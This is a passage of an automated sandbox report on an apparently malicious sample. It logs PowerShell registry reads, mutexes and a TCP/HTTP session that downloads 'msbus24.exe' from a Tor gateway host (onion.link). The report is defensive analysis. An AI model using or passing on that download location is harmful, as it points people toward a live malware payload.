Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell		4	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell		4	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security		4	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell		4	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell		1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine		1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine		2	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds		1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance		1	Fn
Open Key	HKEY_CURRENT_USER		1	Fn
Open Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds		1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment	value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment	value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ	1	Fn
Read Value	HKEY_CURRENT_USER\Environment	value_name = PSMODULEPATH, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell	value_name = path, data = 0, type = REG_SZ	4	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell	value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ	2	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	value_name = ApplicationBase, data = 0, type = REG_SZ	2	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	2	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	value_name = ApplicationBase, data = 0, type = REG_SZ	4	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	4	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	value_name = ApplicationBase, data = 0, type = REG_SZ	5	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	5	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	value_name = StackVersion, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	value_name = StackVersion, data = 2.0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	value_name = StackVersion, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	value_name = StackVersion, data = 2.0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	value_name = ApplicationBase, data = 0, type = REG_SZ	2	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	2	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds	value_name = PipelineMaxStackSizeMB, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion	value_name = InstallationType, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion	value_name = InstallationType, data = Client, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance	value_name = Library, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance	value_name = Library, data = netfxperf.dll, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance	value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance	value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance	value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance	value_name = First Counter, data = 4986, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance	value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance	value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance	value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance	value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance	value_name = Counter Names, type = REG_BINARY	2	Fn Data
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds	value_name = PipelineMaxStackSizeMB, type = REG_NONE	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Values	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN		1	Fn
Enumerate Values	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN		1	Fn
Enumerate Values	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN		1	Fn
Enumerate Values	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN		1	Fn
Enumerate Values	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN		1	Fn
Enumerate Values	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN		1	Fn
Get Key Info	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN		1	Fn
Get Key Info	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN		1	Fn
Get Key Info	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Get Key Info	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Get Key Info	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Get Key Info	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn

Module (8)

Operation	Additional Information	Count	Logfile
Get Filename	process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe	1	Fn
Get Filename	process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe	2	Fn
Create Mapping	filename = System Paging File, protection = PAGE_READWRITE	1	Fn
Enumerate	process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe	1	Fn
Map	process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe	1	Fn
Unmap	process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe	1	Fn
Unmap	process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe	1	Fn

System (10)

Operation	Additional Information	Success	Count	Logfile
Open Certificate Store	encoding_type = 65537, flags = 8708		1	Fn
Get Computer Name	result_out = 1R6PFH		1	Fn

Mutex (32)

Operation	Additional Information	Count	Logfile
Create	mutex_name = Global\.net clr networking	10	Fn
Create	mutex_name = Global\.net clr networking	1	Fn
Create	mutex_name = Global\.net clr networking	5	Fn
Open	mutex_name = Global\.net clr networking, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE	1	Fn
Open	mutex_name = Global\.net clr networking	1	Fn
Open	mutex_name = Global\.net clr networking	9	Fn
Open	mutex_name = Global\.net clr networking	5	Fn

Environment (1)

Operation	Additional Information	Success	Count	Logfile
Set Environment String	name = PSMODULEPATH, value = C:\Users\hJrD1KOKY DS8lUjv\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\		1	Fn

Network Behavior

DNS (2)

Operation	Additional Information	Success	Count	Logfile
Resolve Name	host = fbbkvm7ezghq4dx3.onion.link, address_out = 188.166.203.69		1	Fn
Resolve Name	host = onion.link, address_out = 103.198.0.2		1	Fn

TCP Sessions (2)

Information	Value
Total Data Sent	0.43 KB (437 bytes)
Total Data Received	7.46 KB (7644 bytes)
Contacted Host Count	2
Contacted Hosts	188.166.203.69:80, 103.198.0.2:443

TCP Session #1

Information	Value
Handle	0x4a4
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	188.166.203.69
Remote Port	80
Local Address	0.0.0.0
Local Port	1728
Data Sent	0.09 KB (88 bytes)
Data Received	0.26 KB (267 bytes)

Operations

Operation	Additional Information	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Connect	remote_address = 188.166.203.69, remote_port = 80	1	Fn
Send	flags = NO_FLAG_SET, size = 88, size_out = 88	1	Fn Data
Receive	flags = NO_FLAG_SET, size = 4096, size_out = 267	1	Fn Data
Close	type = SOCK_STREAM	1	Fn

TCP Session #2

Information	Value
Handle	0x4a0
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	103.198.0.2
Remote Port	443
Local Address	0.0.0.0
Local Port	1984
Data Sent	0.34 KB (349 bytes)
Data Received	7.20 KB (7377 bytes)

Operations

Operation	Additional Information	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Connect	remote_address = 103.198.0.2, remote_port = 443	1	Fn
Send	flags = NO_FLAG_SET, size = 114, size_out = 114	1	Fn Data
Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Receive	flags = NO_FLAG_SET, size = 89, size_out = 89	1	Fn Data
Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Receive	flags = NO_FLAG_SET, size = 4581, size_out = 1353	1	Fn Data
Receive	flags = NO_FLAG_SET, size = 3228, size_out = 3228	1	Fn Data
Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Receive	flags = NO_FLAG_SET, size = 587, size_out = 587	1	Fn Data
Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Receive	flags = NO_FLAG_SET, size = 4, size_out = 4	1	Fn Data
Send	flags = NO_FLAG_SET, size = 134, size_out = 134	1	Fn Data
Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
Send	flags = NO_FLAG_SET, size = 101, size_out = 101	1	Fn Data
Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Receive	flags = NO_FLAG_SET, size = 2032, size_out = 2032	1	Fn Data
Close	type = SOCK_STREAM	1	Fn

HTTP Sessions (1)

Information	Value
Total Data Sent	0.09 KB (88 bytes)
Total Data Received	0.26 KB (267 bytes)
Contacted Host Count	1
Contacted Hosts	fbbkvm7ezghq4dx3.onion.link

HTTP Session #1

Information	Value
Server Name	fbbkvm7ezghq4dx3.onion.link
Server Port	80
Data Sent	0.09 KB (88 bytes)
Data Received	0.26 KB (267 bytes)

Operations

Operation	Additional Information	Count	Logfile
Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS	1	Fn
Open Connection	protocol = http, server_name = fbbkvm7ezghq4dx3.onion.link, server_port = 80	1	Fn
Open HTTP Request	http_verb = GET, http_version = HTTP/1.1, target_resource = /msbus24.exe, url = fbbkvm7ezghq4dx3.onion.link/msbus24.exe	1	Fn
Send HTTP Request	headers = host: fbbkvm7ezghq4dx3.onion.link, connection: Keep-Alive	1	Fn Data
Read Response	size = 4096, size_out = 267	1	Fn Data
Close Session		1	Fn

Process #4: timeout.exe

(Host: 293, Network: 0)

Information	Value
ID	#4
File Name	c:\windows\system32\timeout.exe
Command Line	TIMEOUT /t 20 /nobreak
Initial Working Directory	C:\Users\hJrD1KOKY DS8lUjv\Desktop\
Monitor	Start Time: 00:02:06, Reason: Child Process
Unmonitor	End Time: 00:02:35, Reason: Terminated by Timeout
Monitor Duration	00:00:29

OS Process Information

Information	Value
PID	0x818
Parent PID	0xa08 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	1R6PFH\hJrD1KOKY DS8lUjv
Groups	1R6PFH\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000f3e9 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 828

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	Readable	Region Actions
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	Readable	Region Actions
pagefile_0x00000000000c0000	0x000c0000	0x000c6fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000000d0000	0x000d0000	0x000d1fff	Pagefile Backed Memory	Readable, Writable	Region Actions
timeout.exe.mui	0x000e0000	0x000e1fff	Memory Mapped File	Readable, Writable	Region Actions
private_0x00000000000f0000	0x000f0000	0x000f0fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000100000	0x00100000	0x00100fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000110000	0x00110000	0x0011ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000190000	0x00190000	0x0020ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000300000	0x00300000	0x003fffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000400000	0x00400000	0x004fffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000500000	0x00500000	0x00687fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000690000	0x00690000	0x00810fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000820000	0x00820000	0x01c1ffff	Pagefile Backed Memory	Readable	Region Actions
sortdefault.nls	0x01c20000	0x01eeefff	Memory Mapped File	Readable	Region Actions
kernel32.dll	0x77600000	0x7771efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x77720000	0x77819fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77820000	0x779c8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	Readable	Region Actions
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	Readable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions
timeout.exe	0xff320000	0xff32bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
version.dll	0x7fefc930000	0x7fefc93bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x7fefd940000	0x7fefd9aafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x7fefdb40000	0x7fefdbdefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x7fefe060000	0x7fefe0c6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x7fefe0d0000	0x7fefe1d8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
nsi.dll	0x7fefe540000	0x7fefe547fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x7fefe550000	0x7fefe55dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x7fefe560000	0x7fefe5d0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x7fefe870000	0x7fefe89dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x7fefe8c0000	0x7fefe988fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x7fefe9b0000	0x7fefeadcfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ws2_32.dll	0x7feffa80000	0x7feffaccfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apisetschema.dll	0x7feffb40000	0x7feffb40fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000007fffffb0000	0x7fffffb0000	0x7fffffd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000007fffffd3000	0x7fffffd3000	0x7fffffd3fff	Private Memory	Readable, Writable	Region Actions
private_0x000007fffffde000	0x7fffffde000	0x7fffffdffff	Private Memory	Readable, Writable	Region Actions

Host Behavior

File (119)

Operation	Filename	Additional Information	Count	Logfile
Get Info	STD_INPUT_HANDLE		1	Fn
Get Info	STD_OUTPUT_HANDLE		23	Fn
Open	STD_INPUT_HANDLE		2	Fn
Open	STD_OUTPUT_HANDLE		70	Fn
Write	STD_OUTPUT_HANDLE	size = 15	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 34	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 4	20	Fn Data
Write	STD_OUTPUT_HANDLE	size = 1	1	Fn Data

Module (2)

Operation	Additional Information	Success	Count	Logfile
Get Handle	module_name = c:\windows\system32\timeout.exe		1	Fn
Get Filename	process_name = c:\windows\system32\timeout.exe		1	Fn

System (172)

Operation	Additional Information	Success	Count	Logfile
